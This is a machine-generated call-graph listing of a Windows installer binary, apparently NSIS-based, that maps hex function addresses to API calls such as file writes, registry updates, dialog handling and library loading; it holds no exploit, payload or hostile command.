11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 